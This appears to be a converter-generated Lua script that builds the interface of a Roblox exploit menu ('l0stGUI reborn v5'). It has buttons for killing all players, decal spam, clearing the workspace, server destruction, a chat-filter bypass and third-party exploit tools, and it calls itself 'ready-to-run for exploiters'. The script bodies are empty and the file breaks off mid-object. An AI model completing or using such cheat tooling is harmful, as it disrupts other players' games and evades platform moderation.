--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 114 | Scripts: 45 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.MainFrame
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["2"]["Size"] = UDim2.new(0, 282, 0, 340);
G2L["2"]["Position"] = UDim2.new(0, 0, 0.26005, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[MainFrame]];


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["3"] = Instance.new("Frame", G2L["2"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["3"]["Size"] = UDim2.new(0, 290, 0, 26);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["4"] = Instance.new("TextLabel", G2L["3"]);
G2L["4"]["TextWrapped"] = true;
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["TextSize"] = 14;
G2L["4"]["TextScaled"] = true;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["BackgroundTransparency"] = 1;
G2L["4"]["Size"] = UDim2.new(0, 282, 0, 25);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Text"] = [[l0stGUI reborn v5 by l0stk1dd88]];


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["5"] = Instance.new("TextLabel", G2L["3"]);
G2L["5"]["TextWrapped"] = true;
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["TextSize"] = 14;
G2L["5"]["TextScaled"] = true;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["BackgroundTransparency"] = 1;
G2L["5"]["Size"] = UDim2.new(0, 137, 0, 25);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Text"] = [[Server destruction]];
G2L["5"]["Position"] = UDim2.new(0, 0, 1, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["6"] = Instance.new("TextLabel", G2L["3"]);
G2L["6"]["TextWrapped"] = true;
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["TextSize"] = 14;
G2L["6"]["TextScaled"] = true;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["BackgroundTransparency"] = 1;
G2L["6"]["Size"] = UDim2.new(0, 120, 0, 25);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Text"] = [[Scripts]];
G2L["6"]["Position"] = UDim2.new(0.49837, 0, 1, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["7"] = Instance.new("Frame", G2L["2"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["7"]["Size"] = UDim2.new(0, 8, 0, 313);
G2L["7"]["Position"] = UDim2.new(0.48582, 0, 0.07602, 0);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Page1
G2L["8"] = Instance.new("TextButton", G2L["2"]);
G2L["8"]["TextWrapped"] = true;
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["TextSize"] = 14;
G2L["8"]["TextScaled"] = true;
G2L["8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Text"] = [[Kill All]];
G2L["8"]["Name"] = [[Page1]];
G2L["8"]["Position"] = UDim2.new(0.02482, 0, 0.15824, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["9"] = Instance.new("LocalScript", G2L["8"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["a"] = Instance.new("TextButton", G2L["2"]);
G2L["a"]["TextWrapped"] = true;
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextScaled"] = true;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Text"] = [[Set Skybox]];
G2L["a"]["Name"] = [[Page1]];
G2L["a"]["Position"] = UDim2.new(0.02482, 0, 0.2752, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["c"] = Instance.new("TextButton", G2L["2"]);
G2L["c"]["TextWrapped"] = true;
G2L["c"]["BorderSizePixel"] = 0;
G2L["c"]["TextSize"] = 14;
G2L["c"]["TextScaled"] = true;
G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["c"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["Text"] = [[Decal Spam]];
G2L["c"]["Name"] = [[Page1]];
G2L["c"]["Position"] = UDim2.new(0.02482, 0, 0.38923, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["d"] = Instance.new("LocalScript", G2L["c"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["e"] = Instance.new("TextButton", G2L["2"]);
G2L["e"]["TextWrapped"] = true;
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextScaled"] = true;
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Unanchor all]];
G2L["e"]["Name"] = [[Page1]];
G2L["e"]["Position"] = UDim2.new(0.02482, 0, 0.51204, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["f"] = Instance.new("LocalScript", G2L["e"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["10"] = Instance.new("TextButton", G2L["2"]);
G2L["10"]["TextWrapped"] = true;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextScaled"] = true;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[Flood(broken)]];
G2L["10"]["Name"] = [[Page1]];
G2L["10"]["Position"] = UDim2.new(0.02482, 0, 0.63192, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["12"] = Instance.new("TextButton", G2L["2"]);
G2L["12"]["TextWrapped"] = true;
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 14;
G2L["12"]["TextScaled"] = true;
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[Play Music]];
G2L["12"]["Name"] = [[Page1]];
G2L["12"]["Position"] = UDim2.new(0.02482, 0, 0.75181, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["13"] = Instance.new("LocalScript", G2L["12"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["14"] = Instance.new("TextButton", G2L["2"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[Clear workspace]];
G2L["14"]["Name"] = [[Page1]];
G2L["14"]["Position"] = UDim2.new(0.02482, 0, 0.86877, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["15"] = Instance.new("LocalScript", G2L["14"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["16"] = Instance.new("TextButton", G2L["2"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[LK SS]];
G2L["16"]["Name"] = [[Page2]];
G2L["16"]["Position"] = UDim2.new(0.53901, 0, 0.15824, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["17"] = Instance.new("LocalScript", G2L["16"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["18"] = Instance.new("TextButton", G2L["2"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[Infinite Yield FE]];
G2L["18"]["Name"] = [[Page2]];
G2L["18"]["Position"] = UDim2.new(0.53901, 0, 0.2752, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["19"] = Instance.new("LocalScript", G2L["18"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1a"] = Instance.new("TextButton", G2L["2"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Fling GUI]];
G2L["1a"]["Name"] = [[Page2]];
G2L["1a"]["Position"] = UDim2.new(0.53901, 0, 0.38923, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1b"] = Instance.new("LocalScript", G2L["1a"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1c"] = Instance.new("TextButton", G2L["2"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[RemoteSpy]];
G2L["1c"]["Name"] = [[Page2]];
G2L["1c"]["Position"] = UDim2.new(0.53901, 0, 0.51204, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1d"] = Instance.new("LocalScript", G2L["1c"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1e"] = Instance.new("TextButton", G2L["2"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[LALOL Hub]];
G2L["1e"]["Name"] = [[Page2]];
G2L["1e"]["Position"] = UDim2.new(0.53901, 0, 0.63192, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1f"] = Instance.new("LocalScript", G2L["1e"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["20"] = Instance.new("TextButton", G2L["2"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Chat Bypass]];
G2L["20"]["Name"] = [[Page2]];
G2L["20"]["Position"] = UDim2.new(0.53901, 0, 0.75181, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["21"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["22"] = Instance.new("TextButton", G2L["2"]);
G2L["22"]["TextWrapped"] = true;
G2L["22"]["BorderSizePixel"] = 0;
G2L["22"]["TextSize"] = 14;
G2L["22"]["TextScaled"] = true;
G2L["22"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["22"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Text"] = [[Dex Explorer]];
G2L["22"]["Name"] = [[Page2]];
G2L["22"]["Position"] = UDim2.new(0.53901, 0, 0.86877, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["23"] = Instance.new("LocalScript", G2L["22"]);



-- StarterGui.ScreenGui.MainFrame.Frame
G2L["24"] = Instance.new("Frame", G2L["2"]);
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["24"]["Size"] = UDim2.new(0, 8, 0, 314);
G2L["24"]["Position"] = UDim2.new(1, 0, 0.07308, 0);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["25"] = Instance.new("Frame", G2L["2"]);
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["25"]["Size"] = UDim2.new(0, 289, 0, 111);
G2L["25"]["Position"] = UDim2.new(0, 0, 0.99955, 0);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["26"] = Instance.new("TextLabel", G2L["25"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["BackgroundTransparency"] = 1;
G2L["26"]["Size"] = UDim2.new(0, 289, 0, 112);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[Thank you for using l0stGUI V5! This means huge support to me! This was made in ROBLOX Studio then turned into a Lua code using a plugin for it to be ready-to-run for exploiters just like you! Note: Server destruction only works in games with ReplicationFiltering disabled!]];


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["27"] = Instance.new("Frame", G2L["2"]);
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["27"]["Size"] = UDim2.new(0, 290, 0, 11);
G2L["27"]["Position"] = UDim2.new(0, 0, 0.96582, 0);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection
G2L["28"] = Instance.new("Frame", G2L["2"]);
G2L["28"]["BorderSizePixel"] = 0;
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["28"]["Size"] = UDim2.new(0, 269, 0, 314);
G2L["28"]["Position"] = UDim2.new(1, 0, 0.07647, 0);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Name"] = [[StatSection]];


-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedInput
G2L["29"] = Instance.new("TextBox", G2L["28"]);
G2L["29"]["Name"] = [[SpeedInput]];
G2L["29"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextWrapped"] = true;
G2L["29"]["TextSize"] = 14;
G2L["29"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["TextScaled"] = true;
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["PlaceholderText"] = [[Put walkspeed here]];
G2L["29"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["29"]["Position"] = UDim2.new(0.45725, 0, 0.02875, 0);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedInput.LocalScript
G2L["2a"] = Instance.new("LocalScript", G2L["29"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedExecute
G2L["2b"] = Instance.new("TextButton", G2L["28"]);
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[Set walkspeed]];
G2L["2b"]["Name"] = [[SpeedExecute]];
G2L["2b"]["Position"] = UDim2.new(0.05576, 0, 0.02875, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedExecute.LocalScript
G2L["2c"] = Instance.new("LocalScript", G2L["2b"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.JumpPowerExecute
G2L["2d"] = Instance.new("TextButton", G2L["28"]);
G2L["2d"]["TextWrapped"] = true;
G2L["2d"]["BorderSizePixel"] = 0;
G2L["2d"]["TextSize"] = 14;
G2L["2d"]["TextScaled"] = true;
G2L["2d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["2d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2d"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["2d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2d"]["Text"] = [[Set jumppower]];
G2L["2d"]["Name"] = [[JumpPowerExecute]];
G2L["2d"]["Position"] = UDim2.new(0.05576, 0, 0.19808, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection.JumpPowerExecute.LocalScript
G2L["2e"] = Instance.new("LocalScript", G2L["2d"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.JumpInput
G2L["2f"] = Instance.new("TextBox", G2L["28"]);
G2L["2f"]["Name"] = [[JumpInput]];
G2L["2f"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["PlaceholderText"] = [[Put JumpPower in here]];
G2L["2f"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["2f"]["Position"] = UDim2.new(0.45725, 0, 0.20128, 0);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.StatSection.JumpInput.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2f"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.GravityInput
G2L["31"] = Instance.new("TextBox", G2L["28"]);
G2L["31"]["Name"] = [[GravityInput]];
G2L["31"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["31"]["BorderSizePixel"] = 0;
G2L["31"]["TextWrapped"] = true;
G2L["31"]["TextSize"] = 14;
G2L["31"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["TextScaled"] = true;
G2L["31"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["31"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["31"]["PlaceholderText"] = [[Put gravity here]];
G2L["31"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["31"]["Position"] = UDim2.new(0.45725, 0, 0.38978, 0);
G2L["31"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.StatSection.GravityInput.LocalScript
G2L["32"] = Instance.new("LocalScript", G2L["31"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.GravityExecute
G2L["33"] = Instance.new("TextButton", G2L["28"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 14;
G2L["33"]["TextScaled"] = true;
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["33"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[Set gravity]];
G2L["33"]["Name"] = [[GravityExecute]];
G2L["33"]["Position"] = UDim2.new(0.05576, 0, 0.38978, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection.GravityExecute.LocalScript
G2L["34"] = Instance.new("LocalScript", G2L["33"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.GravityExecute.LocalScript
G2L["35"] = Instance.new("LocalScript", G2L["33"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.MusicInput
G2L["36"] = Instance.new("TextBox", G2L["28"]);
G2L["36"]["CursorPosition"] = -1;
G2L["36"]["Name"] = [[MusicInput]];
G2L["36"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["36"]["BorderSizePixel"] = 0;
G2L["36"]["TextWrapped"] = true;
G2L["36"]["TextSize"] = 14;
G2L["36"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["TextScaled"] = true;
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["36"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["36"]["PlaceholderText"] = [[Put MusicID here]];
G2L["36"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["36"]["Position"] = UDim2.new(0.05576, 0, 0.5655, 0);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.StatSection.MusicInput.LocalScript
G2L["37"] = Instance.new("LocalScript", G2L["36"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.MusicSpeed
G2L["38"] = Instance.new("TextBox", G2L["28"]);
G2L["38"]["Name"] = [[MusicSpeed]];
G2L["38"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["38"]["BorderSizePixel"] = 0;
G2L["38"]["TextWrapped"] = true;
G2L["38"]["TextSize"] = 14;
G2L["38"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["TextScaled"] = true;
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["38"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["38"]["PlaceholderText"] = [[Put Music's speed here]];
G2L["38"]["Size"] = UDim2.new(0, 81, 0, 43);
G2L["38"]["Position"] = UDim2.new(0.62825, 0, 0.5655, 0);
